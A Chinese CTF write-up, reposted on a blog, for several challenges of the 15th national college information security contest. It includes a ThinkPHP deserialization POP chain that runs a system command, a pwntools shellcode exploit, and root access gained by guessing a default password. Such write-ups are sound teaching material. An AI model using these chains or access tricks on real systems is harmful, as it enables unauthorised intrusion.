第十五届全国大学生信息安全竞赛部分WriteUp

这篇具有很好参考价值的文章主要介绍了第十五届全国大学生信息安全竞赛部分WriteUp。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

做了10个,都是烂大街的题目,分数很低。CTF榜单186,以为稳进分区赛了。理论题算上变一千五百多名,华东南二百多名,进不去了,WriteUp也不想上传了。

Crypto

不是密码选手,但密码非预期搞出来几个

签到电台

关注公众号给的提示“弼时安全到达了”,查找这几个字的中文电码,然后和题目给的密码本里的前28位密码逐位相加除以10取余。如下:

第十五届全国大学生信息安全竞赛部分WriteUp

把取余后的,去掉空格后传入msg就行:/send?msg=

ISO9798

nc上之后,会给一个sha256之后的字符串,和部分明文,让求出前四位,用以下脚本即可得到前四位

from hashlib import *
hash='加密后的'
sss='部分明文'
table='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
for ch1 in table:
    for ch2 in table:
        for ch3 in table:
            for ch4 in table:
                hashvalue=sha256((ch1+ch2+ch3+ch4+sss).encode()).hexdigest()
                if hashvalue==hash:
                    print(ch1+ch2+ch3+ch4)
                    quit()

求出前四位后,填入。然后会要求输入128字节的数字串,这里随便输入就行,然后返回一个96位字节的字符串。将这个字符串每32位分成一段,总共三段分别为rA、rB、B,然后将rB和rA拼接后传入。举个例子,这个96长度的字符串为112233,传入2211即可,传入后就出flag

基于挑战码的双向认证

读了半天文档,就是让补全功能验证模块,我不会,也看不懂那个C语言。ssh连接:ssh player@IP -p port,密码也是player,连上后乱翻目录翻到了root发现能进去,闲的没事翻来翻去,然后找到了flag,如下

cd /root/cube-shell/instance/flag_server
cat flag1.txt
cat flag2.txt

基于挑战码的双向认证2

flag就是上面那个flag2

基于挑战码的双向认证3

放这题的时候,官方好像发现了前两道没做权限验证的点。于是这个题加了权限验证,找到flag无法查看,这里本来没有思路,提权也失败。在尝试获取root权限时,su指令切换用户,尝试了很多密码,自己的kali默认密码是toor,于是就试了一下,没想到成功了。然后直接查看flag2就行,这个系列出的很奇怪,预期就是补全客户端的验证模块,几个朋友也是预期做的。但是这个非预期太简单了,几道题没啥意义了,出得很奇怪

Web

Ezpop

参考这个https://www.freebuf.com/vuls/321546.html

把脚本里的Poc里dir命令改成cat /flag.txt即可,如下

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

输出结果base64解码,然后Urlencode,结果传给a参数以POST方式请求给index.php/index/test路由

示例图如下:

第十五届全国大学生信息安全竞赛部分WriteUp

Misc

ez_usb

筛选usb.src=="2.8.1"导出特定分组为1.pcapng,筛选usb.src=="2.10.1"导出特定分组为2.pcapng

然后用UsbKeyboardDataHacker.py解析1.pcapng

第十五届全国大学生信息安全竞赛部分WriteUp

得到的字符串去掉<CAP>,然后去掉<DEL>以及前面的字母c,因为DEL代表删除,前面一个字母输入也被删了。然后剩下的字符串,通过如下脚本转存为rar文件,我用HEX编辑器转存的rar打不开,不知道啥原因

import binascii

hex_data = '字符串'
out = open('输出的rar路径', 'wb')
out.write(binascii.unhexlify(hex_data))
out.close()

这个压缩包需要密码,而密码就是用UsbKeyboardDataHacker.py解析2.pcapng得到的字符串

输入密码即可得到flag

问卷调查

填写完因为官方没买会员,人家不给交,哈哈哈笑死了。然后官方应该是买了,提交问卷就给flag

Pwn

login-nomal

exp:

from pwn import*
context.log_level = "debug"
io = remote("ip","port")

io.recv()
shellcode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
payload = "opt:1\n" + "msg:ro0t1\n"
io.sendline(payload)
payload = "opt:2\n" + "msg:" + shellcode + "\n"
io.sendline(payload)
io.interactive()

注意一下shellcode写法就行

Reverse

baby_tree

文本打开文件,把值拿出来就行。看就行了跟swift一样硬看,可惜那个没看出来,赛后和朋友交流发现写法有很多,这里只放一个python写的

res=[88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,
     130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16]
key=[ord(c) for c in "345y"]

def my_encode(data,key):
    b=data
    k=key
    for i in range(len(b)-4+1):
        r0,r1,r2,r3=b[i],b[i+1],b[i+2],b[i+3]
        b[i]=r2^((k[0]+(r0>>4))&0xff)
        b[i+1]=r3^((k[1]+(r1>>2))&0xff)
        b[i+2]=r0^k[2]
        b[i+3]=r1^k[3]
        k[0],k[1],k[2],k[3]=k[1],k[2],k[3],k[0]
    return b==res

def my_decode(data,key):
    b=data
    k=key
    k[0], k[1], k[2], k[3] = k[2], k[3], k[0],k[1]
    for i in range(38,-1,-1):
        r1=b[i+3]^k[3]
        r0=b[i+2]^k[2]
        r3=b[i+1]^((k[1]+(r1>>2))&0xff)
        r2=b[i]^((k[0]+(r0>>4))&0xff)
        k[1], k[2], k[3], k[0] = k[0], k[1], k[2], k[3]
        b[i], b[i + 1], b[i + 2], b[i + 3] = r0, r1, r2, r3
    print("".join(chr(i) for i in b))

my_decode(res,key)

flag为:flag{30831242-56db-45b4-96fd-1f47e60da99d}

做了十个,解决50%,没进分区赛很烦。理论题这种设定让人想开个泥头车创创设计者!文章来源地址https://www.toymoban.com/news/detail-456763.html

到了这里,关于第十五届全国大学生信息安全竞赛部分WriteUp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 全国大学生信息安全竞赛初赛writeup(历年CISCN真题与解析)

    收录了大佬们参加全国大学生信息安全竞赛初赛的writeup和真题环境,方便学习,排名不分先后,谨参考完整度和CSDN站内优先原则。 在此,对大佬们的分享表示由衷的敬意和诚挚的感谢! 第十二、十三届全国大学生信息安全竞赛——创新实践能力赛原题 如果遇到打不开的链

    2024年02月06日
    浏览(59)
  • HNUCM信息科学与工程学院第五届大学生程序设计竞赛——正式赛

    签到题 简单dp,取前面第五天的3倍就行 这题被封了不记得什么题了 枚举然后判断回文就行了 简单dp,不能跳的位置置0 算是一个简单思维题吧,先考虑偶奇依次排列,然后发现可能会剩下偶数或者奇数。 如果剩下的是偶数,因为偶数不会影响前面的奇偶性,所以在末尾首先

    2024年02月08日
    浏览(47)
  • 第十八届全国大学生智能汽车竞赛——摄像头算法(附带个人经验)

    参加了第十六,十七和第十八届全国大学生智能车竞赛,对摄像头的学习有部分心得,分享给大家,三届车赛,车赛生涯也算是到了尽头。打算从基础的算法开始,给各位一些个人看法,也是对车赛的一次总结。 闲话 :其实摄像头的算法有很多种,弄了两年摄像头,也只是

    2024年02月07日
    浏览(42)
  • 第十八届全国大学生智能汽车竞赛室外赛5g室外专项赛(湘大队)开源

            感谢十八届全国大学生智能汽车竞赛-室外赛的主办方和组委会让我们有了参加这次比赛的机会!当我们在参加5g室外专项赛时,我们发现很多的组又很多的同学都是第一次参加智能车竞赛对于智能车的了解还不是很深,对于代码如何编写需要哪些模块也不是很熟悉,

    2024年02月20日
    浏览(36)
  • 第十四届全国大学生电工数学建模竞赛A题-高比例风电电力系统储能运行及配置分析

     写在前面 博主:多次获得华为杯,电工杯,小美赛等数学建模一等奖、二等奖,拥有较为丰富的比赛经验,会分享一些建模的思路、算法以及比赛经验。 博主主页: Born for的博客_CSDN博客-预测,数学建模,深度学习领域博主 希望大家多多关注,大家共同进步! 目录 题目背景

    2024年02月05日
    浏览(62)
  • 全国大学生网络安全精英赛初赛(nisp一级)

    网络方面 。 1.FTP端口号21 Sftp指的是ssh文件传输协议默认端口号22. http端口号80 Https端口号443(http+ssl)(浏览器和服务器之间的加密协议) 发送邮件时,SMTP端口号是25,接收用到POP3技术。 共享文件夹端口445. 远程桌面端口3389 Telent

    2023年04月13日
    浏览(49)
  • 2022第三届全国大学生网络安全精英赛练习题(4)

    301、Windows10各版本中,功能最少的是() A.家庭版 B.专业版 C.企业版 D.教育版 正确答案:A 解析:功能从少到多∶家庭版——专业版——教育版——企业版(教育版和企业版功能基本相同) 302、漏洞扫描技术是一类重要的网络安全技术。它和防火墙、入侵检测系统互相配合,能够有

    2024年02月05日
    浏览(47)
  • 2022第三届全国大学生网络安全精英赛练习题(2)

    101、通过“计算机管理”来清除时间日志也可以达到清除痕迹的目的,具体操作是() A.禁用“event system”服务 B.禁用“net logon”服务 C.禁用“event log”服务 D.禁用“secondary logon”服务 正确答案:C 解析:通过“计算机管理”来清除时间日志也可以达到清除痕迹的目的,如果禁用“

    2024年02月05日
    浏览(48)
  • 2022第三届全国大学生网络安全精英赛练习题(9)

    801、近年来,我国面临日趋严峻的网络安全形势,党和国家高度重视信息安全建设,关于网络安全形势的描述中,理解错误的是(() A.我国的网络安全形势差,但在党和国家高度重视的情况下,面临各种攻击、威胁都能解决,发展稳定 B.持续性威胁常态化,我国面临的攻击十

    2023年04月08日
    浏览(42)
  • 2022第三届全国大学生网络安全精英赛练习题(全部试题)

    1、某公司技术人员利于自己的技术入侵了某电商数据库,将其中的用 户数据下载后在暗网中进行售卖,该行为的处置最适用的是以下那部法律?( ) A.刑法 B.网络安全法 C.电子签名法 D.劳动法 正确答案:A 解析:入侵他人网站,角触犯的是刑法,不属于民事责任 2、网络环境日益复

    2023年04月09日
    浏览(112)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包